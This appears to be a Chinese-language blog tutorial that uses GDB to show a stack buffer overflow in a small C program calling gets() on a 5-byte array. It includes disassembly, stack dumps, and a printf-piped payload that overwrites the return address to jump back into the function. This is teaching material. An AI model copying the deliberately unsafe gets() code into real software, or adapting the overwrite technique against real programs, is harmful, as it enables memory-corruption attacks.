zoukankan      html  css  js  c++  java

  • 用GDB示範Buffer Overflow 的過程

     1 #include <stdio.h>
 2 void return_input(void)
 3 {
 4     char array[5]; 
 5     
 6     gets(array);
 7     printf("%s\n", array);
 8 }
 9 main()
10 {
11 return_input();
12 return 0;
13 }

    >gdb -q overflow

    (gdb) disas return_input
    Dump of assembler code for function return_input:
    0x0040138c <+0>: push %ebp
    0x0040138d <+1>: mov %esp,%ebp
    0x0040138f <+3>: sub $0xc,%esp
    0x00401392 <+6>: lea -0x5(%ebp),%eax
    0x00401395 <+9>: mov %eax,(%esp)
    0x00401398 <+12>: call 0x401b1c <gets>
    0x0040139d <+17>: lea -0x5(%ebp),%eax
    0x004013a0 <+20>: mov %eax,(%esp)
    0x004013a3 <+23>: call 0x401b14 <puts>
    0x004013a8 <+28>: leave
    0x004013a9 <+29>: ret
    End of assembler dump.

    (gdb) b *0x00401398  //0x00401398 <+12>: call 0x401b1c <gets>
    Breakpoint 2 at 0x401398: file overflow.c, line 6.
    (gdb) b *0x004013a3  //0x004013a3 <+23>: call 0x401b14 <puts>
    Breakpoint 3 at 0x4013a3: file overflow.c, line 7.
    (gdb) r

    (gdb) disas main
    Dump of assembler code for function main:
    0x004013aa <+0>: push %ebp
    0x004013ab <+1>: mov %esp,%ebp
    0x004013ad <+3>: call 0x4018dc <__main>
    0x004013b2 <+8>: call 0x40138c <return_input>
    0x004013b7 <+13>: mov $0x0,%eax
    0x004013bc <+18>: pop %ebp
    0x004013bd <+19>: ret
    End of assembler dump.

    (gdb) x/20x $esp //0x004013b7為returnaddress,$esp=0x28ff14,$ebp=0x0028ff28
    0x28ff14: 0x0028ff1b 0x00000026 0x7efde000 0x0028ff28
    0x28ff24: 0x004013b7 0x0028ff68 0x004010b9 0x00000001
    0x28ff34: 0x005f2ba8 0x005f1978 0xffffffff 0x0028ff58
    0x28ff44: 0x76c98cd5 0xf2b91182 0xfffffffe 0x76c8161e
    0x28ff54: 0x76c815a0 0x00000000 0x005f1978 0x76c82811

    (gdb) cont
    Continuing.

    ABCDEDDDDDDDD

    (gdb) x/20x 0x28ff14
    0x28ff14: 0x0028ff1b 0x41000026 0x45444342 0x44444444
    0x28ff24: 0x44444444 0x0028ff00 0x004010b9 0x00000001
    0x28ff34: 0x005f2ba8 0x005f1978 0xffffffff 0x0028ff58
    0x28ff44: 0x76c98cd5 0xf2b91182 0xfffffffe 0x76c8161e
    0x28ff54: 0x76c815a0 0x00000000 0x005f1978 0x76c82811

    (gdb) step

    Program received signal SIGSEGV, Segmentation fault.
    0x44444444 in ?? ()  //成功改掉return address

    ====串改return address=====

    >printf "ABCDEDDDD\xb2\x13\x40\x00" | overflow  //jmp to 0x004013b2 <+8>: call 0x40138c <return_input>
    ABCDEDDDD?@
    ABCDEDDDD?@
  • 相关阅读:
    Docker镜像与仓库(四)
    Docker网络与存储(三)
    Docker基本使用(一)
    虚拟化KVM之优化(三)
    修改CENTOS7的网卡ens33修改为eth0
    虚拟化KVM之安装(二)
    虚拟化KVM之概述(一)
    Python不同版本打包程序为.exe文件
    JSON
    同源策略(same-origin policy)及三种跨域方法
  • 原文地址:https://www.cnblogs.com/bittorrent/p/2707319.html
Copyright © 2011-2022 走看看